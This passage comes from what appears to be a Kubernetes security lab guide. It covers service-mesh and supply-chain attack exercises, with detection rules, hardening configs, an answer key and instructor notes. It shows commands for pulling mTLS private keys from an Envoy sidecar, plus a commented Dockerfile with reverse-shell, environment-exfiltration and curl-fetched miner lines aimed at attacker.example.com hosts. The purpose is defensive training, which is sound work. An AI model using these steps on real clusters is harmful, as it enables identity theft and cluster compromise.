Step 4.4: Extract Service Mesh Certificates¶
# Istio sidecar proxies hold mTLS certificates — extract them
# from a pod that has the istio-proxy sidecar
# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding
# Connect to the auth-service's istio-proxy sidecar
$ k exec -it auth-service-abc123 -n skyforge-prod -c istio-proxy -- /bin/bash
# Istio stores certificates in /etc/certs/ or via SDS
$ ls /etc/certs/ 2>/dev/null || echo "SDS mode — certs delivered via Envoy SDS API"
SDS mode — certs delivered via Envoy SDS API
# Check Envoy admin interface for certificate information
$ curl -s localhost:15000/certs
{
"certificates": [
{
"ca_cert": [
{
"path": "\u003cinline\u003e",
"serial_number": "REDACTED",
"subject_alt_names": [
{
"uri": "spiffe://cluster.local/ns/istio-system/sa/istiod"
}
],
"days_until_expiration": "364",
"valid_from": "2026-04-07T00:00:00Z",
"expiration_time": "2027-04-07T00:00:00Z"
}
],
"cert_chain": [
{
"path": "\u003cinline\u003e",
"serial_number": "REDACTED",
"subject_alt_names": [
{
"uri": "spiffe://cluster.local/ns/skyforge-prod/sa/auth-service-sa"
}
],
"days_until_expiration": "0",
"valid_from": "2026-04-07T08:00:00Z",
"expiration_time": "2026-04-08T08:00:00Z"
}
]
}
]
}
# Extract the actual certificate and key from Envoy SDS
$ curl -s localhost:15000/config_dump | jq '.configs[] | select(.["@type"] | contains("SecretsConfigDump"))' > secrets_dump.json
# The certificate chain and private key are in the SDS response
$ cat secrets_dump.json | jq -r '.dynamic_active_secrets[0].secret.tls_certificate.certificate_chain.inline_bytes' | base64 -d
-----BEGIN CERTIFICATE-----
REDACTED-CERTIFICATE-DATA
-----END CERTIFICATE-----
$ cat secrets_dump.json | jq -r '.dynamic_active_secrets[0].secret.tls_certificate.private_key.inline_bytes' | base64 -d
-----BEGIN RSA PRIVATE KEY-----
REDACTED-PRIVATE-KEY-DATA
-----END RSA PRIVATE KEY-----
Finding: Service Mesh Certificates Extractable
An attacker with pod exec access can extract the mTLS certificates from the Envoy sidecar. These certificates can be used to impersonate the service identity (spiffe://cluster.local/ns/skyforge-prod/sa/auth-service-sa) when communicating with other mesh services — effectively stealing the service's identity.
Step 4.5: Sidecar Injection Attack¶
# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding
# Manipulate the sidecar injector to inject a malicious container alongside
# legitimate workloads. This requires cluster-admin access.
# Check current sidecar injection configuration
$ k get configmap istio-sidecar-injector -n istio-system -o jsonpath='{.data.config}' | head -20
policy: enabled
alwaysInjectSelector: []
neverInjectSelector: []
template: |
...
# An attacker could modify the sidecar template to include a data exfiltration container
# or modify the Envoy configuration to log all traffic to an external endpoint
# Verify which namespaces have auto-injection enabled
$ k get namespaces -l istio-injection=enabled
NAME STATUS AGE
skyforge-prod Active 5d
skyforge-staging Active 5d
Detection: Service Mesh Attacks¶
Falco Rules¶
# Falco rule: Detect VirtualService modification
- rule: Istio VirtualService Modified
desc: VirtualService resource was created or modified — potential traffic hijacking
condition: >
kevt and (kcreate or kupdate) and
ka.target.resource = "virtualservices"
output: >
Istio VirtualService modified (user=%ka.user.name action=%ka.verb
name=%ka.target.name ns=%ka.target.namespace)
priority: HIGH
tags: [k8s, istio, service_mesh, traffic_hijack]
# Falco rule: Detect Envoy admin API access
- rule: Envoy Admin API Accessed
desc: Process accessed Envoy admin API — potential certificate theft
condition: >
container and fd.sport = 15000 and evt.type in (connect, accept)
and not proc.name in (pilot-agent, envoy)
output: >
Envoy admin API accessed (user=%user.name process=%proc.name
container=%container.name pod=%k8s.pod.name)
priority: HIGH
tags: [istio, envoy, admin_api]
KQL Detection¶
// KQL: Detect Istio VirtualService modification
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.objectRef.resource == "virtualservices"
and AuditLog.verb in ("create", "update", "patch")
| extend HasMirror = AuditLog.requestObject has "mirror"
| project TimeGenerated,
User = AuditLog.user.username,
Action = AuditLog.verb,
VirtualService = AuditLog.objectRef.name,
Namespace = AuditLog.objectRef.namespace,
HasMirror,
SourceIP = AuditLog.sourceIPs[0]
| sort by TimeGenerated desc
// KQL: Detect direct pod-to-pod communication bypassing mesh
// Requires Istio access logs ingested into Sentinel
IstioAccessLogs_CL
| where response_flags_s has "NR" // No route — request bypassed the mesh
| project TimeGenerated, source_workload_s, destination_workload_s,
request_path_s, response_code_d, response_flags_s
| sort by TimeGenerated desc
// KQL: Detect Envoy admin API access
ContainerLog
| where LogEntry has "localhost:15000" or LogEntry has "127.0.0.1:15000"
| where ContainerName != "istio-proxy"
| project TimeGenerated, PodName, ContainerName, LogEntry
| sort by TimeGenerated desc
SPL Detection¶
// SPL: Detect VirtualService modification with mirror config
index=kubernetes sourcetype="kube:audit"
objectRef.resource=virtualservices verb IN ("create", "update", "patch")
| spath "requestObject" as request_body
| eval has_mirror=if(match(request_body, "mirror"), "YES", "NO")
| table _time, user.username, verb, objectRef.name, objectRef.namespace, has_mirror
// SPL: Detect mTLS bypass — plaintext connections to mesh services
index=istio sourcetype="istio:accesslog"
| where NOT match(upstream_transport_failure_reason, "^$")
OR tls_version="none"
| table _time, source_workload, destination_workload, request_path,
response_code, tls_version
// SPL: Detect Envoy admin API access from unexpected processes
index=kubernetes sourcetype="kube:container-logs"
("localhost:15000" OR "127.0.0.1:15000")
| where container_name!="istio-proxy"
| table _time, pod_name, container_name, log
Defensive Measures: Securing the Service Mesh¶
Prevention Controls
1. Enforce STRICT mTLS Mode
apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata:
name: default
namespace: istio-system # Mesh-wide
spec:
mtls:
mode: STRICT # Reject ALL plaintext connections
2. Require Sidecar Injection for All Workloads
apiVersion: v1
kind: Namespace
metadata:
name: skyforge-prod
labels:
istio-injection: enabled
---
# OPA policy to reject pods without sidecar
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sRequiredSidecar
metadata:
name: require-istio-sidecar
spec:
match:
kinds:
- apiGroups: [""]
kinds: ["Pod"]
namespaces: ["skyforge-prod"]
parameters:
sidecarName: istio-proxy
3. Restrict Istio CRD Modification
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: istio-crd-readonly
rules:
- apiGroups: ["networking.istio.io", "security.istio.io"]
resources: ["*"]
verbs: ["get", "list", "watch"]
# Only mesh admins should have create/update/delete
4. Disable Envoy Admin API in Production
Set ISTIO_META_ENABLE_ADMIN_INTERFACE=false in the sidecar container or restrict to localhost with proxyAdmin port disabled.
5. Enable Istio Authorization Policies
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
name: auth-service-policy
namespace: skyforge-prod
spec:
selector:
matchLabels:
app: auth-service
rules:
- from:
- source:
principals: ["cluster.local/ns/skyforge-prod/sa/api-gateway-sa"]
to:
- operation:
methods: ["GET", "POST"]
paths: ["/api/v1/*"]
Exercise 4 Summary¶
| Step | Action | Finding | Severity |
|---|---|---|---|
| 4.1 | Mesh enumeration | mTLS in PERMISSIVE mode, missing sidecar | High |
| 4.2 | mTLS bypass | Direct plaintext pod-to-pod communication | High |
| 4.3 | Traffic hijacking | VirtualService mirror attack | Critical |
| 4.4 | Certificate extraction | mTLS certs and private keys extracted | Critical |
| 4.5 | Sidecar injection | Sidecar injector modifiable by admin | High |
Exercise 5: Supply Chain & Image Attacks¶
Time Estimate: 45–60 minutes ATT&CK Mapping: T1195.002 (Supply Chain Compromise), T1525 (Implant Internal Image)
Objectives¶
- Identify vulnerable base images in the container registry using Trivy
- Understand how a trojanized container image is constructed (educational pseudocode)
- Exploit image pull policies to force deployment of malicious images
- Demonstrate admission control bypass techniques
- Implement image signing verification with Cosign and admission webhooks
Background¶
Supply chain attacks targeting container images are among the most impactful in cloud-native environments. A compromised base image or CI/CD pipeline can introduce backdoors into every deployment. Kubernetes image pull policies, admission controllers, and image signing are the primary defenses — but misconfigurations in any of these layers create exploitable gaps.
Step 5.1: Identify Vulnerable Base Images¶
# Scan the data-processor image for vulnerabilities
$ trivy image registry.helios.example.com/skyforge/data-processor:2.1.0
# Expected Output (SYNTHETIC)
registry.helios.example.com/skyforge/data-processor:2.1.0 (debian 12.4)
============================================================
Total: 247 (UNKNOWN: 3, LOW: 42, MEDIUM: 108, HIGH: 71, CRITICAL: 23)
┌──────────────────┬──────────────────┬──────────┬────────────────┬──────────────┬──────────────────────────────────────────┐
│ Library │ Vulnerability │ Severity │ Installed Ver │ Fixed Ver │ Title │
├──────────────────┼──────────────────┼──────────┼────────────────┼──────────────┼──────────────────────────────────────────┤
│ openssl │ CVE-2024-XXXXX │ CRITICAL │ 3.0.11 │ 3.0.13 │ Buffer overflow in X.509 certificate │
│ │ │ │ │ │ verification │
│ curl │ CVE-2024-YYYYY │ CRITICAL │ 7.88.1 │ 8.5.0 │ SOCKS5 heap buffer overflow │
│ glibc │ CVE-2024-ZZZZZ │ CRITICAL │ 2.36 │ 2.38 │ Stack-based buffer overflow in getaddrinfo│
│ python3.11 │ CVE-2024-AAAAA │ HIGH │ 3.11.2 │ 3.11.8 │ Path traversal in zipfile module │
│ pip │ CVE-2024-BBBBB │ HIGH │ 23.0.1 │ 24.0 │ Command injection via requirements file │
│ libssh2 │ CVE-2024-CCCCC │ HIGH │ 1.10.0 │ 1.11.0 │ Authentication bypass in keyboard- │
│ │ │ │ │ │ interactive auth │
│ numpy │ CVE-2024-DDDDD │ MEDIUM │ 1.24.2 │ 1.26.0 │ Denial of service in array processing │
│ ... │ ... │ ... │ ... │ ... │ ... │
└──────────────────┴──────────────────┴──────────┴────────────────┴──────────────┴──────────────────────────────────────────┘
# Check for secrets embedded in image layers
$ trivy image --scanners secret registry.helios.example.com/skyforge/data-processor:2.1.0
# Expected Output (SYNTHETIC)
registry.helios.example.com/skyforge/data-processor:2.1.0 (secrets)
============================================================
Total: 3 (HIGH: 2, CRITICAL: 1)
┌─────────────────────────┬──────────┬──────────────────────────────────────────┐
│ Category │ Severity │ Match │
├─────────────────────────┼──────────┼──────────────────────────────────────────┤
│ AWS Access Key │ CRITICAL │ AKIAIOSFODNN7EXAMPLE (layer 3) │
│ Private Key │ HIGH │ -----BEGIN RSA PRIVATE KEY----- (layer 5)│
│ Generic Password │ HIGH │ DB_PASSWORD=REDACTED (layer 2, ENV) │
└─────────────────────────┴──────────┴──────────────────────────────────────────┘
Finding: Critical Vulnerabilities and Embedded Secrets
The data-processor image has 23 CRITICAL and 71 HIGH vulnerabilities, plus embedded secrets including an AWS access key and private key in the image layers. Even if environment variables are changed at runtime, secrets baked into image layers are permanently recoverable from the image history.
# Scan all images in the cluster
$ for pod in $(k get pods -n skyforge-prod -o jsonpath='{.items[*].spec.containers[*].image}'); do
echo "=== Scanning: $pod ==="
trivy image --severity HIGH,CRITICAL --quiet "$pod"
done
# Expected Summary (SYNTHETIC)
=== Scanning: registry.helios.example.com/skyforge/data-processor:2.1.0 ===
HIGH: 71, CRITICAL: 23
=== Scanning: registry.helios.example.com/skyforge/auth-service:1.8.3 ===
HIGH: 34, CRITICAL: 8
=== Scanning: registry.helios.example.com/skyforge/api-gateway:3.2.1 ===
HIGH: 12, CRITICAL: 2
=== Scanning: registry.helios.example.com/skyforge/report-engine:1.4.0 ===
HIGH: 45, CRITICAL: 15
Step 5.2: Trojanized Container Image (Educational Pseudocode)¶
Educational Content Only
The following demonstrates how a supply chain attack works conceptually. All code is pseudocode for defensive understanding. No functional malware is provided.
# EDUCATIONAL PSEUDOCODE — NOT FUNCTIONAL CODE
# Demonstrates how an attacker might trojanize a base image
# Purpose: Understanding the threat model for detection and prevention
# Start with the legitimate base image
FROM registry.helios.example.com/skyforge/base-image:latest
# ATTACK VECTOR 1: Add a reverse shell that activates on container start
# (PSEUDOCODE — educational illustration only)
# RUN echo '#!/bin/bash' > /usr/local/bin/health-check.sh && \
# echo '# PSEUDOCODE: establish_reverse_connection(attacker_c2.example.com, 443)' >> /usr/local/bin/health-check.sh && \
# chmod +x /usr/local/bin/health-check.sh
# ATTACK VECTOR 2: Modify the entrypoint to exfiltrate environment variables
# (PSEUDOCODE — educational illustration only)
# ENTRYPOINT ["/bin/sh", "-c", "env | PSEUDOCODE_SEND_TO(attacker.example.com); exec $@"]
# ATTACK VECTOR 3: Add a cryptominer as a background process
# (PSEUDOCODE — educational illustration only)
# RUN curl -o /usr/local/bin/system-monitor https://attacker.example.com/PSEUDOCODE_MINER && \
# chmod +x /usr/local/bin/system-monitor
# ATTACK VECTOR 4: Modify libraries to intercept credentials
# (PSEUDOCODE — educational illustration only)
# RUN pip install PSEUDOCODE_BACKDOORED_PACKAGE==1.0.0
Key Takeaways for Defenders:
- Image layers are additive — every
RUN,COPY, orADDcreates a new layer - Secrets in any layer are permanently recoverable via
docker historyordocker save - Modified entrypoints or added binaries may not be visible to vulnerability scanners
- Behavioral analysis (Falco) and image comparison tools are needed to detect trojanized images
Step 5.3: Exploit Image Pull Policies¶
# Check current image pull policies across all pods
$ k get pods -n skyforge-prod -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.spec.containers[*].imagePullPolicy}{"\n"}{end}'
data-processor IfNotPresent
auth-service-abc123 IfNotPresent
auth-service-def456 IfNotPresent
api-gateway-xxx IfNotPresent
api-gateway-yyy IfNotPresent
api-gateway-zzz IfNotPresent
report-engine-xxx IfNotPresent
# The issue: IfNotPresent means once an image is cached on a node,
# it will NEVER be re-pulled — even if the registry image has been updated
# (e.g., replaced with a trojanized version)
# Demonstrate the attack:
# 1. Attacker pushes trojanized image to registry with SAME tag
# EDUCATIONAL PSEUDOCODE:
# $ docker push registry.helios.example.com/skyforge/data-processor:2.1.0
# (trojanized version overwrites the legitimate tag)
# 2. With IfNotPresent: existing pods keep running the old (safe) image
# BUT: any NEW pod scheduled on a node that doesn't have the image cached
# will pull the trojanized version
# 3. Force a rollout to trigger new pulls:
# EDUCATIONAL PSEUDOCODE:
# $ k rollout restart deployment/data-processor -n skyforge-prod
# New pods pull the trojanized image from registry
# 4. With imagePullPolicy: Always — EVERY pod restart pulls fresh,
# so trojanized images affect ALL pods immediately
Finding: Image Tag Mutability Enables Supply Chain Attack
Using imagePullPolicy: IfNotPresent with mutable tags (like 2.1.0 or latest) means an attacker who compromises the registry can replace images. The Always policy would catch the replacement faster but also means every pod restart pulls the malicious image. The only safe approach is image digest pinning combined with image signing.
Step 5.4: Admission Control Bypass¶
# Check if admission controllers are configured
$ k api-versions | grep admissionregistration
admissionregistration.k8s.io/v1
$ k get validatingwebhookconfigurations
NAME WEBHOOKS AGE
istio-validator-istio-system 1 5d
$ k get mutatingwebhookconfigurations
NAME WEBHOOKS AGE
istio-sidecar-injector 1 5d
# Check for OPA/Gatekeeper
$ k get constrainttemplates
No resources found
# Check for Kyverno
$ k get clusterpolicies
error: the server doesn't have a resource type "clusterpolicies"
Finding: No Image Admission Controller
The cluster has no OPA/Gatekeeper constraints or Kyverno policies for image validation. The only admission webhooks are Istio's sidecar injector and validator. There is no policy preventing:
- Images from untrusted registries
- Images without signatures
- Images with known critical vulnerabilities
- Images using
latesttag - Images running as root
# Demonstrate: deploy a pod from an untrusted registry
# EDUCATIONAL PSEUDOCODE
$ cat <<'EOF' | k apply -f -
apiVersion: v1
kind: Pod
metadata:
name: untrusted-test
namespace: skyforge-prod
spec:
containers:
- name: untrusted
image: attacker-registry.example.com/malicious-image:latest
command: ["sleep", "86400"]
EOF
pod/untrusted-test created
# No admission controller blocked this — the pod was created successfully
# In a properly secured cluster, this should have been DENIED by:
# 1. An admission webhook that validates image registry allowlists
# 2. An image signing policy (Cosign/Sigstore)
# 3. A vulnerability scan gate
Step 5.5: Image Signing and Verification¶
# Demonstrate proper image signing with Cosign
# EDUCATIONAL PSEUDOCODE — shows the correct defensive workflow
# Step 1: Generate a signing keypair
$ cosign generate-key-pair
Enter password for private key: REDACTED
Private key written to cosign.key
Public key written to cosign.pub
# Step 2: Sign the image after building
$ cosign sign --key cosign.key registry.helios.example.com/skyforge/data-processor:2.1.0@sha256:REDACTED_DIGEST
Pushing signature to: registry.helios.example.com/skyforge/data-processor:sha256-REDACTED_DIGEST.sig
# Step 3: Verify the signature before deployment
$ cosign verify --key cosign.pub registry.helios.example.com/skyforge/data-processor:2.1.0@sha256:REDACTED_DIGEST
Verification for registry.helios.example.com/skyforge/data-processor:2.1.0@sha256:REDACTED_DIGEST --
The following checks were performed on each of these signatures:
- The cosign claims were validated
- The signatures were verified against the specified public key
[{"critical":{"identity":{"docker-reference":"registry.helios.example.com/skyforge/data-processor"},"image":{"docker-manifest-digest":"sha256:REDACTED_DIGEST"},"type":"cosign container image signature"},"optional":{"Issuer":"https://accounts.helios.example.com","Subject":"ci-pipeline@helios.example.com"}}]
# Step 4: Enforce with admission policy (Kyverno example)
$ cat <<'EOF' | k apply -f -
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: require-image-signature
spec:
validationFailureAction: Enforce
background: false
rules:
- name: verify-image-signature
match:
any:
- resources:
kinds:
- Pod
verifyImages:
- imageReferences:
- "registry.helios.example.com/skyforge/*"
attestors:
- entries:
- keys:
publicKeys: |-
-----BEGIN PUBLIC KEY-----
REDACTED-COSIGN-PUBLIC-KEY
-----END PUBLIC KEY-----
EOF
# Use image digests instead of mutable tags
# SECURE pod spec:
$ cat <<'EOF'
apiVersion: v1
kind: Pod
metadata:
name: data-processor-secure
namespace: skyforge-prod
spec:
containers:
- name: processor
# Pin to digest — immutable reference, cannot be replaced
image: registry.helios.example.com/skyforge/data-processor@sha256:a1b2c3d4e5f6REDACTED
imagePullPolicy: Always
securityContext:
runAsNonRoot: true
runAsUser: 65534
readOnlyRootFilesystem: true
allowPrivilegeEscalation: false
capabilities:
drop:
- ALL
EOF
Detection: Supply Chain Attacks¶
Falco Rules¶
# Falco rule: Detect image from untrusted registry
- rule: Image from Untrusted Registry
desc: Pod created with image from a registry not in the allowlist
condition: >
kevt and kcreate and ka.target.resource = "pods"
and not ka.req.pod.containers.image pmatch (
"registry.helios.example.com/*",
"docker.io/library/*",
"gcr.io/distroless/*",
"quay.io/istio/*"
)
output: >
Pod created with image from untrusted registry
(user=%ka.user.name image=%ka.req.pod.containers.image
pod=%ka.target.name ns=%ka.target.namespace)
priority: HIGH
tags: [k8s, supply_chain, untrusted_image]
# Falco rule: Detect image with latest tag
- rule: Image Using Latest Tag
desc: Pod created with :latest tag — mutable and unverifiable
condition: >
kevt and kcreate and ka.target.resource = "pods"
and ka.req.pod.containers.image contains ":latest"
output: >
Pod using :latest image tag (user=%ka.user.name
image=%ka.req.pod.containers.image pod=%ka.target.name)
priority: MEDIUM
tags: [k8s, supply_chain, latest_tag]
# Falco rule: Detect unexpected binary execution in container
- rule: Unexpected Process in Container
desc: An unexpected binary was executed in a known container image
condition: >
spawned_process and container
and container.image.repository = "registry.helios.example.com/skyforge/data-processor"
and not proc.name in (python3, pip, sh, bash, processor.py)
output: >
Unexpected process in data-processor container
(process=%proc.name command=%proc.cmdline container=%container.name
pod=%k8s.pod.name image=%container.image.repository)
priority: HIGH
tags: [container, supply_chain, unexpected_process]
KQL Detection¶
// KQL: Detect images from untrusted registries
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "create" and AuditLog.objectRef.resource == "pods"
| extend Image = tostring(AuditLog.requestObject.spec.containers[0].image)
| where Image !startswith "registry.helios.example.com/"
and Image !startswith "gcr.io/distroless/"
and Image !startswith "docker.io/istio/"
| project TimeGenerated,
User = AuditLog.user.username,
PodName = AuditLog.objectRef.name,
Namespace = AuditLog.objectRef.namespace,
Image,
SourceIP = AuditLog.sourceIPs[0]
| sort by TimeGenerated desc
// KQL: Detect images using latest tag or no digest
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "create" and AuditLog.objectRef.resource == "pods"
| extend Image = tostring(AuditLog.requestObject.spec.containers[0].image)
| where Image has ":latest" or (Image !has "@sha256:" and Image !has_any (":v", ":1.", ":2.", ":3."))
| project TimeGenerated,
User = AuditLog.user.username,
PodName = AuditLog.objectRef.name,
Image
| sort by TimeGenerated desc
// KQL: Detect new container image pull from untrusted source
ContainerInventory
| where ImageTag == "latest" or Image !startswith "registry.helios.example.com"
| project TimeGenerated, ContainerID, Image, ImageTag, ContainerState
| sort by TimeGenerated desc
SPL Detection¶
// SPL: Detect images from untrusted registries
index=kubernetes sourcetype="kube:audit"
verb=create objectRef.resource=pods
| spath "requestObject.spec.containers{}.image" as image
| where NOT match(image, "^registry\.helios\.example\.com/")
AND NOT match(image, "^gcr\.io/distroless/")
| table _time, user.username, objectRef.name, objectRef.namespace, image
// SPL: Detect images with known critical vulnerabilities (from Trivy integration)
index=trivy sourcetype="trivy:scan"
| spath "Results{}.Vulnerabilities{}.Severity" as severity
| where severity="CRITICAL"
| stats count as critical_vulns by ArtifactName, ArtifactType
| where critical_vulns > 0
| sort -critical_vulns
| table ArtifactName, critical_vulns
// SPL: Detect unexpected image pull events
index=kubernetes sourcetype="kube:events"
reason="Pulling" OR reason="Pulled"
| spath "involvedObject.name" as pod_name
| spath "message" as msg
| rex field=msg "image \"(?<image>[^\"]+)\""
| where NOT match(image, "^registry\.helios\.example\.com/")
| table _time, pod_name, image, msg
Defensive Measures: Securing the Supply Chain¶
Prevention Controls
1. Image Digest Pinning
Always reference images by digest, never by mutable tag:
# BAD — mutable tag
image: registry.helios.example.com/skyforge/data-processor:2.1.0
# GOOD — immutable digest
image: registry.helios.example.com/skyforge/data-processor@sha256:a1b2c3d4REDACTED
2. Registry Allowlist with Admission Controller
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: restrict-image-registries
spec:
validationFailureAction: Enforce
rules:
- name: validate-registries
match:
any:
- resources:
kinds:
- Pod
validate:
message: "Images must come from approved registries"
pattern:
spec:
containers:
- image: "registry.helios.example.com/*"
3. Vulnerability Scanning Gate in CI/CD
# CI/CD pipeline step (PSEUDOCODE)
- name: scan-image
run: |
trivy image --exit-code 1 --severity CRITICAL \
registry.helios.example.com/skyforge/$IMAGE:$TAG
# Pipeline fails if CRITICAL vulnerabilities found
4. Multi-Stage Builds with Distroless Base
# Build stage
FROM python:3.11-slim AS builder
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir --target=/install -r requirements.txt
COPY . .
# Production stage — minimal attack surface
FROM gcr.io/distroless/python3-debian12:nonroot
COPY --from=builder /install /usr/local/lib/python3.11/site-packages
COPY --from=builder /app /app
WORKDIR /app
USER 65534
ENTRYPOINT ["python3", "/app/processor.py"]
5. Container Image Signing Enforcement
Deploy Cosign + Kyverno or Connaisseur to enforce image signatures on all pod creation events.
6. Read-Only Container Filesystems
Exercise 5 Summary¶
| Step | Action | Finding | Severity |
|---|---|---|---|
| 5.1 | Image vulnerability scan | 23 CRITICAL + embedded secrets | Critical |
| 5.2 | Trojanized image analysis | Multiple backdoor vectors identified | Critical |
| 5.3 | Image pull policy abuse | Mutable tags enable image replacement | High |
| 5.4 | Admission control audit | No image validation policies | High |
| 5.5 | Image signing gap | No signature verification in place | High |
Answer Key¶
Exercise 1: Container Escape¶
Exercise 1 Answers
Q: What Linux capability is required for the nsenter container escape? A: CAP_SYS_ADMIN is the primary capability needed. Combined with CAP_SYS_PTRACE and access to /proc, it allows entering the host's namespaces via nsenter --target 1.
Q: Why is mounting the host root filesystem at /host dangerous? A: It gives the container read-write access to the entire host filesystem, including /etc/shadow, kubelet credentials at /var/lib/kubelet/, other pods' secret volumes, and the container runtime socket. This makes container escape trivial.
Q: What is the detection gap when an attacker uses nsenter? A: After nsenter, the attacker's processes run in the host's PID namespace. Standard container-level monitoring (like container logs) will not see these processes. You need host-level monitoring (Falco as DaemonSet, auditd, or eBPF-based tools) to detect the escape.
Q: How does Docker socket access differ from nsenter escape? A: Docker socket access allows creating new containers with arbitrary configurations (privileged, host networking, etc.). nsenter enters the host's existing namespaces directly. Both achieve host access, but Docker socket abuse creates new artifacts (containers) that are more detectable.
Exercise 2: RBAC Exploitation¶
Exercise 2 Answers
Q: What is the minimum RBAC permission needed to escalate to cluster-admin? A: The ability to create ClusterRoleBinding resources (rbac.authorization.k8s.io API group, clusterrolebindings resource, create verb). An attacker can bind any existing ClusterRole (including cluster-admin) to any subject.
Q: Why is pods/exec permission dangerous? A: pods/exec allows executing commands inside any pod the SA has access to. This can be used to steal service account tokens, access mounted secrets, and pivot to other workloads — all without creating new pods.
Q: What is the RBAC escalation chain in this exercise? A: data-processor-sa (list secrets) → steal deploy-pipeline-sa token from skyforge-ci namespace → deploy-pipeline-sa has RBAC wildcard permissions → create ClusterRoleBinding granting data-processor-sa cluster-admin.
Q: How should CI/CD service accounts be properly scoped? A: CI/CD service accounts should use namespace-scoped Roles (not ClusterRoles), have permissions limited to deployments, services, and configmaps only, and should never have create/update on clusterrolebindings or secrets.
Exercise 3: etcd Secret Extraction¶
Exercise 3 Answers
Q: Why are Kubernetes secrets not encrypted by default in etcd? A: By default, Kubernetes stores secrets as base64-encoded data in etcd — base64 is an encoding, not encryption. The EncryptionConfiguration API resource must be explicitly configured to enable encryption at rest using AES-CBC, AES-GCM, or a KMS provider.
Q: What certificates are needed to access etcd? A: etcd requires mutual TLS authentication. You need the etcd CA certificate (ca.crt), a client certificate (server.crt or healthcheck-client.crt), and the corresponding private key. These are stored at /etc/kubernetes/pki/etcd/ on the control plane node.
Q: What is the difference between etcd encryption and using an external secrets manager? A: etcd encryption at rest protects secrets stored in etcd's data directory on disk. An external secrets manager (Vault, AWS Secrets Manager) removes secrets from etcd entirely — the cluster only stores references, and secrets are fetched at runtime. External managers also provide rotation, auditing, and dynamic secrets.
Q: How can you detect unauthorized etcd access? A: Monitor for: (1) etcdctl process execution on control plane nodes, (2) network connections to port 2379 from non-API-server sources, (3) file access to /etc/kubernetes/pki/etcd/ by unexpected processes, (4) etcd audit logs showing GET requests for /registry/secrets/ paths.
Exercise 4: Service Mesh Attacks¶
Exercise 4 Answers
Q: What is the difference between PERMISSIVE and STRICT mTLS modes? A: PERMISSIVE accepts both mTLS and plaintext connections — it is a transition mode. STRICT requires mTLS for all connections and rejects plaintext. Always use STRICT in production after confirming all services have sidecars.
Q: Why does direct pod-to-pod communication bypass the mesh? A: Istio's Envoy sidecar intercepts traffic on the pod's network interface. When traffic goes through the Kubernetes Service, Envoy can enforce policies. Direct pod IP communication on the application port bypasses the sidecar's iptables rules, avoiding mTLS, authorization policies, and telemetry.
Q: How does VirtualService traffic mirroring enable eavesdropping? A: Istio's mirror directive copies incoming requests to a secondary destination. The attacker adds a mirror pointing to their controlled pod, receiving a copy of every request (including headers, tokens, and body) without disrupting the legitimate traffic flow. The original service still receives and responds to all requests normally.
Q: What is the SPIFFE identity extracted from the sidecar? A: The SPIFFE identity format is spiffe://cluster.local/ns/<namespace>/sa/<service-account>. In this exercise, spiffe://cluster.local/ns/skyforge-prod/sa/auth-service-sa. This identity is used for service-to-service authentication in the mesh. Stealing the certificate allows impersonating this service.
Exercise 5: Supply Chain & Image Attacks¶
Exercise 5 Answers
Q: Why is imagePullPolicy: IfNotPresent insufficient for security? A: With IfNotPresent, once an image is cached on a node, it is never re-pulled. If the registry image is replaced (trojanized), existing pods are safe but new pods on nodes without the cache will pull the malicious image. Neither IfNotPresent nor Always is secure without image digest pinning.
Q: How does image digest pinning prevent supply chain attacks? A: A digest (@sha256:abc123...) is a cryptographic hash of the image manifest. Even if an attacker pushes a new image with the same tag, the digest will be different. Kubernetes will refuse to run the image if the pulled digest does not match the specified digest.
Q: What are the three layers of supply chain defense? A: (1) Image scanning — Trivy/Grype in CI/CD to catch vulnerabilities and secrets. (2) Image signing — Cosign/Sigstore to verify image provenance and integrity. (3) Admission control — Kyverno/OPA/Connaisseur to enforce policies at deploy time (registry allowlist, signature verification, vulnerability thresholds).
Q: Why are multi-stage builds with distroless images important? A: Multi-stage builds separate the build environment (compilers, build tools, source code) from the runtime image. Distroless images contain only the application and its runtime dependencies — no shell, no package manager, no debugging tools. This reduces the attack surface from hundreds of packages to a minimal set, and makes post-exploitation significantly harder for an attacker.
Instructor Notes¶
Lab Facilitation Guide¶
Running This Lab
Group Exercise (recommended: 3–5 participants)
- Split into red team and blue team
- Red team works through Exercises 1–5
- Blue team monitors Falco alerts and writes detection rules in real-time
- Debrief after each exercise: what was detected? What was missed?
Individual Exercise
- Work through exercises sequentially — each builds on the prior
- Spend extra time on the detection sections — write your own rules before reading the answers
- Use a local kind/minikube cluster — all exercises are self-contained
Assessment Criteria
| Criterion | Points | Description |
|---|---|---|
| Container escape completed | 15 | Successfully escaped to host via nsenter |
| RBAC chain identified | 20 | Documented full escalation path |
| etcd secrets extracted | 15 | Extracted and decoded at least 3 secrets |
| Service mesh bypass demonstrated | 15 | Showed mTLS bypass and traffic mirroring |
| Supply chain risk documented | 10 | Trivy scan + admission control audit |
| Detection rules written | 15 | KQL/SPL/Falco rules for each exercise |
| Defensive recommendations | 10 | Actionable hardening for each finding |
| Total | 100 |
Time Management
- Exercise 1: 60–75 min (container escape is foundational)
- Exercise 2: 60–75 min (RBAC chain requires careful enumeration)
- Exercise 3: 45–60 min (straightforward once on control plane)
- Exercise 4: 60–75 min (service mesh concepts may need introduction)
- Exercise 5: 45–60 min (scanning tools do heavy lifting)
Common Mistakes¶
Watch Out For
- Forgetting to check existing RBAC before escalating — always enumerate
auth can-i --listfirst - Not documenting the attack chain — each step should be logged with timestamps
- Skipping detection — the red team value is in the detection rules, not just the exploitation
- Using real IPs or domains — all outputs must use RFC 5737 / *.example.com
- Neglecting the defensive measures — each exercise's prevention controls are equally important as the attack steps
Cleanup¶
# Remove the lab cluster
$ kind delete cluster --name skyforge-lab
Deleting cluster "skyforge-lab" ...
# Verify cleanup
$ kind get clusters
No kind clusters found.
